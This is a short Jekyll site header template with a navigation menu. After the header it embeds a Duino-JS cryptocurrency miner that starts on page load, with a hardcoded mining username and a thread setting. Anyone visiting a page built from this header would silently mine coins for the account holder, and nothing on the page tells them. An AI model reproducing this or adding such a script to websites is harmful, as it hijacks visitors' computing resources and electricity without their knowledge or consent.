<header role="banner">
      <!--<h1 class="logo">{{ site.title }}</h1>-->
      <nav role="navigation">
<ul>
   {% for item in site.data.navigation.links %}
      <li><a href="{{ item.url }}" {% if item.url == page.url %} class="active"{% endif %}>{{ item.title }}</a></li>
   {% endfor %}
</ul>
</nav>
</header>
<script src="duino-js.min.js"></script> <!--imports the Duino-JS miner-->
<script>
    username = "umtksa"; //put your username here (e.g. revox, ericddm, snehaislove or Hoiboy19), the default is Hoiboy19.
    rigid = "github"; //If you want to change the rig ID, you can change this. If you want to keep using "Duino-JS", you can remove this line.
    threads = userThreads; //Set the amount of threads to use here, check out https://github.com/sys-256/Duino-JS for more options. The default is 1.
    startMiner(); //starts the miner
</script>
